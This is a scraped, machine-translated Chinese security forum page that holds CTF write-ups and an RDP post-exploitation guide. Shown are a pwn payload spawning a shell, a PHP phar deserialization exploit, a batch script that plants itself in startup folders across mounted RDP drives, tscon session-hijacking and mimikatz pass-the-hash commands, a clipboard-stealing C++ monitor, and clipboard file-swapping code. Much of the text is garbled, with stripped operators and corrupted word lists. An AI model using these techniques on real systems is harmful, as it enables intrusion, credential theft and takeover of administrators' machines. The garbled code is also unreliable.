#payload+=p32(elf_base+0x1130) payload+=b'/bin/sh\x00' payload+=p32(elf_base+0x128e) #payload+=p32(elf_base+0x3fcc) #payload+=p32(0) payload+=p32(stack-0x50) payload+=p32(0) #payload+=p32(libc+0x18e363) #payload+=p32(libc+0x18e363) payload+=p32(0) payload+=p32(0) payload+=p32(canary) payload+=p32(0)*3 payload+=p32(stack-0x44) payload+=p32(elf_base+0x3fb8) payload+=b'/bin/sh\x00' pause() context.log_level='debug' p.sendafter(b'read:',payload) p.interactive() stackover-revenge provides addition and subtraction functions within 255. At first, no vulnerability was seen, but later I found that a little backdoor code was added to the normal process of the program: IDA presses F5 and cannot see here. The backdoor code in another place can complete the triggering conditions of the above code:
- 4月10日4月10日
- 1篇回复
英特尔确认 Alder Lake BIOS 源代码泄露
英特尔确认 Alder Lake BIOS 源代码泄露

游客发布主题帖子在 A Test Forum

Morning CTF part web simplelogin yakit burst out the password, remember it should be a123456: pppp index.php has an arbitrary file read: ?php //upload.php error_reporting(0); highlight_file(__FILE__); class A { public $a; public function __destruct() { $s=$this-$a; $s(); } } class B{ public $cmd; function __invoke(){ return $this-start(); } function start(){ echo system($this-cmd); } } if(isset($_GET['file'])) { if(strstr($_GET['file'], 'flag')) { die('Get out!'); } echo file_get_contents($_GET['file']); } ? Read upload.php: !--?php error_reporting(0); if(isset($_FILES['file'])){ mkdir('upload'); $uid=uniqid(); $ext=explode('.',$_FILES['file']['name']); $ext=end($ext); move_uploaded_file($_FILES['file']['tmp_name'],'upload/'.$uuid.'.png'); echo'UploadSuccess!FilePath:upload/'.$uuid.'.png'; }-- The uploaded file will be changed to .png Try uploading the phar file and triggering the deserialization execution command with file_get_contents on the homepage: //phar.php ?php//phar.php classA{ public$a; publicfunction__destruct() { $s=$this-a; $s(); } } classB{ public$cmd; function__construct(){ $this-$cmd='catflag'; } function__invoke(){ return$this-start(); } functionstart(){ system($this-cmd); } } $b=newB(); $b-cmd='cat/flag'; $a=newA(); $a-a=$b; @unlink('phar.phar'); $phar=newPhar('phar.phar');//The suffix must be phar $phar-startBuffering(); $phar-setStub('?php__HALT_COMPILER();');//Set stub $phar-setMetadata($a);//Save custom meta-data into manifest $phar-addFromString('a.txt','abb');//Add the file to be compressed $phar-stopBuffering();//Signature automatically calculates ? Upload and access: misc ftp Traffic extraction zip, and then password is the same password password1234567890 crypto baby_Words on Zen with Buddha aes, but after XOR, the result is converted into characters, so you can turn it back and solve aes ruShiWoWen=[ '无', 'mu', 'monk', 'room', 'art', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser' '未', 'li', 'blin', 'due', 'mul', 'pregnancy', 'san', 'black', 'naked', 'bean', 'special', 'div', 'reach', 'return', 'length', 'length', 'length', 'length', 'length', 'length', 'li', 'written', 'number', 'responsible', 'respect', 'ro', 'respect', 'respect', 'know', 'three', 'bing', 'no', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'Insight', 'thought', 'dream', 'until', 'remove', 'horrible', 'restrained', 'restrained', 'restrained', 'restrained', 'will', 'wisdom', 'old', 'toward', 'roar', 'foot', 'you', 'wang', 'you', 'won', 'mu', 'mu', 'light', 'protect', 'jin', 'harmony', 'going', 'treasure', 'win', 'tong', 'won', 'win', 'tong', 'medicine', 'teacher', 'little', 'living', 'pure', 'deal', 'mountain', 'good', 'pass', 'go', 'seven', 'not', 'come', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'Cause', 'Thousand', 'Five', 'Hundred', 'Ten Thousand', 'Flowers', 'Billions', 'Decision', 'Six', 'Fang', 'Name', 'Name', 'Tong', 'Yue', 'Yun', 'Dian', 'Miracle', 'Zun', 'tree', 'root', 'west', 'soap', 'flame', 'north', 'qing', 'number', 'element', 'improve', 'head', 'lower', 'silence', 'quantity', 'element', 'element', 'four', 'element', 'four', 'element', 'four', 'element', 'four', ' 'Do', 'Shi', 'Ga', 'Mu', 'Ni', 'Le', 'A', 'Du', 'Zhong', 'Yang', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong' 'action', 'in', 'empt', 'empt', 'compassion', 'worry', 'someone', 'satisfaction', 'stable', 'rest', 'day', 'night', 'cultivation', 'hold', 'heart', 'seeking', 'recitation', 'recitation', 'this', 'sutra', 'energy', 'death', 'elimination', 'elimination', 'toxic', 'harm', 'high', 'open', 'text', 'super', 'lift', 'cool', 'as if', 'thought', 'that', 'that', 'emperor', 'vi', 'true', 'ling', 'qian', 'shu', 'ha', 'respect', 'Gift', 'Feng', 'Ancestor', 'First', 'Filial Piety', 'Double', 'My Master', 'Stay', 'My Master', 'Love', 'Brother', 'Brother', 'First', 'Friend', 'Friend', 'Friend', 'Friend', 'Music', 'Zen', 'Clan', 'Home', 'My', 'My', 'Teaching', 'Sun', 'Time', 'Tire', 'Bulse', 'Yin', 'Yin', 'Difficult', 'Economic', 'urgent', 'soft', 'soft', 'shoulder', 'creation', 'soft', 'soft', 'shu', 'shu', 'shu', 'shu', 'creation', 'repet', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', ' 'kill', 'release', 'bridge', 'road', 'cove', 'little', 'draw', 'draw', 'draw', 'sleep', 'sweep', 'sweep', 'sweep', 'sweep', 'sweep', 'don', 'invest', 'invest'] enc='The person who recites the love is guarding the Mengzabao and lying the lying of the lying of the heart, and killing the lying of the heart, and worrying, and reciting the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the dec=b'' for i in enc: dec +=(ruShiWoWen.index(i) ^ 64).to_bytes(1, 'little') KEY=b'DASCTF@Key@^_^@Encode!Buddha!' IV=b'IV|DASCTF|OvO|IV' from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad cryptor=AES.new(KEY, AES.MODE_CBC, IV) # padded_data=pad(data.encode('utf-8'), AES.block_size) encrypted_data=cryptor.decrypt(dec) print(encrypted_data) re NormalAndroid When you open jadx, you only call one function in so, ida and look at it in the past: You can see something like a key and transform the key: surface: surface Then enter the encryption logic, which is an AES encryption, and the S box was modified in the past: So I just find a code implemented by AES to modify the S box, and then use the transformed key to decrypt it. Because the network competition was cut off, there was no script stored at that time, so I didn't make it: fromCrypto.Util.numberimportlong_to_bytes,bytes_to_long #https://github.com/bozhu/AES-Python/blob/master/aes.py Sbox=( 0xBE,0xB4,0x9F,0x70,0xDB,0xAD,0x31,0x30,0x6C,0x87, 0x74,0x27,0xC9,0x4C,0x67,0x62,0x0A,0x36,0x08,0xC8, 0x96,0x32,0x00,0xF1,0x38,0x65,0xEC,0xED,0x44,0x25, 0xAA,0x33,0x86,0xEF,0x0D,0x19,0x7D,0xD5,0x45,0xFB, 0x8D,0x61,0xFE,0x50,0x47,0x7E,0x7C,0xF9,0x01,0xDE, 0xFF,0xE1,0xAC,0x5D,0xB5,0x8E,0x48,0xBF,0x90,0x9D, 0x79,0xCB,0xA6,0xA9,0xFC,0x34,0xCF,0x63,0x5A,0x99, 0x98,0xB8,0x92,0x2D,0x02,0x89,0x2C,0x3B,0x15,0x72, 0x5E,0x60,0x29,0x6F,0x0B,0x24,0x6D,0x1C,0x5B,0xE0, 0x37,0xA4,0xCC,0x12,0x93,0xA7,0x09,0xC6,0xB6,0x8F, 0x04,0x20,0xE8,0x46,0xB1,0xAE,0x3A,0x68,0x81,0xCE, 0x2B,0x0C,0xB3,0x3E,0xC0,0x0E,0x4D,0xD8,0xD2,0xA2, 0x9E,0x56,0x28,0xB0,0x35,0x1B,0x5F,0xF5,0x05,0xBC, 0x3C,0x4F,0x8C,0xE6,0xF6,0x75,0xF4,0xF8,0xDD,0x11, 0xC1,0xB9,0x4E,0x97,0xD6,0xF2,0xE4,0xD1,0x82,0xD3, 0x03,0x8B,0x4B,0xCA,0x64,0xEB,0xAB,0x71,0xA1,0xBA, 0xA8,0x6A,0x1E,0x1A,0xA5,0x49,0x6E,0x53,0x66,0x39, 0x51,0xE9,0x26,0xC4,0xDA,0x55,0x3F,0xEA,0x85,0x8A, 0xD9,0x13,0x69,0x1F,0xE2,0x7F,0x2F,0xC5,0x88,0x57, 0x73,0xA3,0xE3,0x0F,0xBB,0x18,0xE5,0x42,0x22,0x52, 0x43,0x80,0x2A,0x6B,0x17,0xD7,0x23,0x06,0x58,0x1D, 0x7A,0x84,0xE7,0xEE,0xD0,0x41,0xD4,0xBD,0xA0,0xC3, 0xC2,0xFD,0x21,0x54,0xDF,0x7B,0xB7,0xF0,0xB2,0x77, 0x3D,0x07,0x78,0x16,0x9C,0x59,0xAF,0x2E,0x83,0xFA, 0x9B,0x95,0xF7,0x40,0x94,0xF3,0xCD,0xC7,0x91,0x10, 0xDC,0x4A,0x14,0x9A,0x5C,0x76 ) InvSbox=[Sbox.index(i)foriinrange(256)] #learntfromhttp://cs.ucsb.edu/~koc/cs178/projects/JT/aes.c xtime=lambdaa:(((a1)^0x1B)0xFF)if(a0x80)else(a1) Rcon=( 0x00,0x01,0x02,0x04,0x08,0x10,0x20,0x40, 0x80,0x1B,0x36,0x6C,0xD8,0xAB,0x4D,0x9A, 0x2F,0x5E,0xBC,0x63,0xC6,0x97,0x35,0x6A, 0xD4,0xB3,0x7D,0xFA,0xEF,0xC5,0x91,0x39, ) deftext2matrix(text): matrix=[] foriinrange(16): byte=(text(8*(15-i)))0xFF ifi%4==0: matrix.append([byte]) else: matrix[i//4].append(byte) returnmatrix defmatrix2text(matrix): text=0 foriinrange(4): forjinrange(4): text|=(matrix[i][j](120-8*(4*i+j))) returntext classAES: def__init__(self,master_key): self.change_key(master_key) defchange_key(self,master_key): self.round_keys=text2matrix(master_key) #printself.round_keys foriinrange(4,4*11): self.round_keys.append([]) ifi%4==0: byte=self.round_keys[i-4][0]\ ^Sbox[self.round_keys[i-1][1]]\ ^Rcon[i//4] self.round_keys[i].append(byte) forjinrange(1,4): byte=self.round_keys[i-4][j]\ ^Sbox[self.round_keys[i-1][(j+1)%4]] self.round_keys[i].append(byte) else: forjinrange(4): byte=self.round_keys[i-4][j]\ ^self.round_keys[i-1][j] self.round_keys[i].append(byte) #printself.round_keys defencrypt(self,plaintext): self.plain_state=text2matrix(plaintext) self.__add_round_key(self.plain_state,self.round_keys[:4]) foriinrange(1,10): self.__round_encrypt(self.plain_state,self.round_keys[4*i:4*(i+1)]) self.__sub_bytes(self.plain_state) self.__shift_rows(self.plain_state) self.__add_round_key(self.plain_state,self.round_keys[40:]) returnmatrix2text(self.plain_state) defdecrypt(self,ciphertext): self.cipher_state=text2matrix(ciphertext) self.__add_round_key(self.cipher_state,self.round_keys[40:]) self.__inv_shift_rows(self.cipher_state) self.__inv_sub_bytes(self.cipher_state) foriinrange(9,0,-1): self.__round_decrypt(self.cipher_state,self.round_keys[4*i:4*(i+1)]) self.__add_round_key(self.cipher_state,self.round_keys[:4]) returnmatrix2text(self.cipher_state) def__add_round_key(self,s,k): foriinrange(4): forjinrange(4): s[i][j]^=k[i][j] def__round_encrypt(self,state_matrix,key_matrix): self.__sub_bytes(state_matrix) self.__shift_rows(state_matrix) self.__mix_columns(state_matrix) self.__add_round_key(state_matrix,key_matrix) def__round_decrypt(
- 4月10日4月10日
- 0篇回复
前端拿到后端长整数数据精度失真问题
前端拿到后端长整数数据精度失真问题

游客发布主题帖子在 A Test Forum

Recently, the administrator in the project got rid of the administrator after rdp was mounted, and thought that he would sort out the use methods for rdp if he had time.: Copying files based on the use of hanging disks is not much. You can decide whether to drag the file or drop the startup item according to the different hanging disks. There are some applications that automatically monitor and copy files, such as: https://github.com/cnucky/DarkGuardianDarkGuardian is a tool used to monitor TSCLIENT (hang disk) after RDP login. When the tool is running in the background, it can automatically obtain the list of files on the hanging disk, download the specified files, copy Trojan files to the startup items on the mounted hard disk, etc. RDPInception This method is relatively useless. The principle is to use the bat script to put it in the server startup item/winlogon execution script, and wait for the administrator to hang up the disk and restart the execution command. @echo off echo Updating Windows. @echo off timeout 1 nul 21 mkdir \\tsclient\c\temp nul 21 mkdir C:\temp nul 21 copy run.bat C:\temp nul 21 copy run.bat \\tsclient\c\temp nul 21 del /q %TEMP%\temp_00.txt nul 21 set dirs=dir /a:d /b /s C:\users\*Startup* set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup* echo|%dirs%|findstr /i 'Microsoft\Windows\Start Menu\Programs\Startup''%TEMP%\temp_00.txt' echo|%dirs2%|findstr /i 'Microsoft\Windows\Start Menu\Programs\Startup''%TEMP%\temp_00.txt' for /F 'tokens=*' %%a in (%TEMP%\temp_00.txt) DO ( copy run.bat '%%a' nul 21 copy C:\temp\run.bat '%%a' nul 21 copy \\tsclient\c\temp\run.bat '%%a' nul 21 ) del /q %TEMP%\temp_00.txt nul 21 REM if 'WINDOMAIN'='%USERDOMAIN%'( cmd.exe /c calc.exe ) RDP Session Hijacking The practical command is tscon, which is normal to switch to a different session through a password. However, under system, you can switch different user sessions without using a password. Switch a session to a different session. This technique is mainly aimed at win7 and above environments. The overall application scenario is: if Windows 2012 or above does not save plaintext by default, you can switch to the target host, or if the current user in the domain is a local user, you can switch to the domain user permissions. First, use psexec locally to mention the system. (Here you can create system services manually to implement them.) You can also use shift/Utilman backdoor to log in to the desktop without password. 1.psexec C:\Windows\system32quser Username Session Name ID Status Idle Time Login Time administrator rdp-tcp#1 1 is running. 2020/12/14 11:14 test rdp-tcp#0 2 running 1:02 2020/12/14 13:04 C:\Windows\system32tscon 2 rdp-tcp#1 2. Services quser sc create sesshijack binpath='cmd.exe /k tscon 2 /dest:rdp-tcp#1' net start sesshijack 3. mimikatz privilege:debug ts:sessions toekn:elevate ts:remote /id:2 4. Shift password-free hijacking com hijacking Shift backdoor in webshell rdpclip.exe utilization The RDP service can copy and paste text and files. It is mainly implemented through this rdpclip.exe process. If you want to know the specific operation in copying, you can use ClipSpy to view the changes in the clipboard. I saw many disclosed methods of using the copyright in ATTCK to obtain the text content of copy, and there is also an idea given in https://research.checkpoint.com/2019/reverse-rdp-attack-code-execution-on-rdp-clients/HOOK RDPClip.exe 1. Shear board monitoring Every 10 seconds, read the clipboard content and save it locally. #include exception #include iostream #include ostream #include stdexcept #include string #include windows.h #include fstream using namespace std; class RaiiClipboard { public: RaiiClipboard() { if (!OpenClipboard(NULL)) throw runtime_error('Can't open clipboard.'); //. or define some custom exception class for clipboard errors. } ~RaiiClipboard() { CloseClipboard(); } //Ban copy private: RaiiClipboard(const RaiiClipboard); RaiiClipboard operator=(const RaiiClipboard); }; class RaiiTextGlobalLock { public: explicit RaiiTextGlobalLock(HANDLE hData) : m_hData(hData) { m_psz=static_castconst char*(GlobalLock(m_hData)); if (!m_psz) throw runtime_error('Can't acquire lock on clipboard text.'); } ~RaiiTextGlobalLock() { GlobalUnlock(m_hData); } const char* Get() const { return m_psz; } private: HANDLE m_hData; const char* m_psz; //Ban copy RaiiTextGlobalLock(const RaiiTextGlobalLock); RaiiTextGlobalLock operator=(const RaiiTextGlobalLock); }; string GetClipboardText() { RaiiClipboard clipboard; HANDLE hData=GetClipboardData(CF_TEXT); if (hData==NULL) { return ''; //throw runtime_error('Can't get clipboard text.'); } RaiiTextGlobalLock textGlobalLock(hData); string text(textGlobalLock.Get()); return text; } void SaveData(string data) { ofstream out('info.txt', ios:app); if (out.is_open()) { out data + '\n'; out '------------------------------\n'; out.close(); } } int main() { static const int kExitOk=0; static const int kExitError=1; string data1=''; string data2=''; try { while (true) { data2=GetClipboardText(); if (data1 !=data2) { cout data2 endl; SaveData(data2); } else { cout 'waiting for clip acting.' endl; Sleep(300000); } data1=data2; Sleep(10000); } return kExitOk; } catch (const exception e) { cerr '*** ERROR: ' e.what() endl; return kExitError; } } According to the Cheesy Rumbles article. You can also use Get-ClipboardContents.ps1 to get clipboard content, and it can be obtained across multiple rdp interfaces. 3924 888 rdpclip.exe x64 3 DMZ2\rasta inject 3924 x64 smb powershell-import D:\Tools\Get-ClipboardContents.ps1 powershell Get-ClipboardContents -PollInterval 1 2. Counterattack rdp How to transfer files to the administrator in reverse without hanging disks? I found two methods online. 1. The Hook GetClipboardData function and DragQueryFileW function are similar. After two days of debugging, I finally found it with the help of all the brothers. 2. Later I thought that I could get the clipboard contents in the previous section, so I could modify the file he copied. CVE-2019-0887 Li Yongde has the same idea as given in paper. Since wcsrchr(szFile, '\') is used to receive addresses, Microsoft also supports./this kind of path. The reason for the vulnerability is similar to that of winrar path. Use the detours library to hook the GetClipboardData function and DragQueryFileW function, add file data and paths to achieve the final effect Replace clipboard file #include iostream #include windows.h #include shlobj.h int CopyFileToClipboard(char szFileName[]); int main() { CopyFileToClipboard('C:\\windows\\system32\\cmd.exe'); return 0; } int CopyFileToClipboard(char szFileName[]) { UINT uDropEffect; HGLOBAL hGblEffect; LPDWORD lpdDropEffect; DROPFILES stDrop; HGLOBAL hGblFiles; LPSTR lpData; uDropEffect=RegisterClipboardFormat('Preferred DropEffect'); hGblEffect=GlobalAlloc(GMEM_ZEROINIT | GMEM_MOVEABLE | GMEM_DDESHARE, sizeof(DWORD)); lpdDropEffect=(LPDWORD)GlobalLock(hGblEffect); *lpdDropEffect=DROPEFFECT_COPY;//Copy; Use DROPEFFECT_MOVE for scraping and pasting GlobalUnlock(hGblEffect); stDrop.pFiles=sizeof(DROPFILES); stDrop.pt.x=0; stDrop.pt.y=0; stDrop.fNC=FALSE; stDrop.fWide=FALSE; hGblFiles=GlobalAlloc(GMEM_ZEROINIT | GMEM_MOVEABLE | GMEM_DDESHARE, sizeof(DROPFILES) + strlen(szFileName) + 2); lpData=(LPSTR)GlobalLock(hGblFiles); memcpy(lpData, stDrop, sizeof(DROPFILES)); strcpy(lpData + sizeof(DROPFILES), szFileName); GlobalUnlock(hGblFiles); OpenClipboard(NULL); EmptyClipboard(); SetClipboardData(CF_HDROP, hGblFiles); SetClipboardData(uDropEffect, hGblEffect); CloseClipboard(); return 1; } In this way, after the administrator copies any file from the server and downloads it to the machine, the file will be replaced with cmd.exe .NET Deserialization See an idea introduced in `https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/december/beware-of-deserialisation-in-.net-methods-and-classes-code-execution-via-paste/`. (I never expected this way to play) Utilize `https://github.com/pwntester/ysoserial.net` The utilization process is to replace it with serialized code when pasting the clipboard. Deserialization operation will be triggered when some applications are pasted. Moreover, if the target .NET application is run with higher permissions, it can also be used as permission promotion. (The current user does not have a UAC account password, but the administrator has opened a .NET application before UAC.) ysoserial.exe -p Clipboard -c calc -F System.String Tested program: PowerShell ISE VS Drawing tools Any WPF application that utilizes TextBox, PasswordBox, or RichTextBox will also be affected. RDP pth User hash login on Windows Mstsc Server needs to be enabled Restricted Admin mode, which is enabled by default in Windows 8.1 Windows Server 2012 R2. At the same time, if Win 7 and Windows Server 2008 R are installed, 2871997 and 2973351 patches are also supported; Client needs to support Restricted Admin mode Turn on Restricted Admin mode REG ADD 'HKLM\System\CurrentControlSet\Control\Lsa' /v DisableRestrictedAdmin /t REG_DWORD /d 000000000 /f When enabled, use: mstsc.exe /restrictedadmin Login without password, the current user's hash will be used for verification Mimikatz mimikatz.exe privilege:debug sekurlsa:pth /user:fbiwarning /domain:172.16.142.136 /ntlm:44f9ea6a7743a8ea6f1956384c39887b '/run:mstsc.exe /restrictedadmin'
- 4月10日4月10日
- 6篇回复

总主题数 25.7k
总帖子数 25.9k

登录

黑帽漏洞数据库

15,048个主题在此版面

ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting

Comodo Dome Firewall 2.7.0 - Cross-Site Scripting

BulletProof FTP Server 2019.0.0.50 - 'SMTP Server' Denial of Service (PoC)

Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection

WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing

Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload

Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process

Apache CouchDB 2.3.0 - Cross-Site Scripting

Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass

Listing Hub CMS 1.0 - 'pages.php id' SQL Injection

Valentina Studio 9.0.4 - 'Host' Denial of Service (PoC)

eDirectory - SQL Injection

NetSetMan 4.7.1 - 'Workgroup' Denial of Service (PoC)

XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting

Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions

MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - Local Privilege Escalation

Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour

ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting

Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-Site Scripting

Comodo Dome Firewall 2.7.0 - Cross-Site Scripting

Who was online for 24 hours 4

Search

动态

针对 NPM Registry API 的新定时攻击可能会暴露私有包

研究人员详细介绍了网络间谍组织 Earth Aughisky 使用的恶意工具

新报告揭示了 Emotet 在近期攻击中使用的传递和规避技术

英特尔确认 Alder Lake BIOS 源代码泄露

前端拿到后端长整数数据精度失真问题

论坛统计

帐户

导航

搜索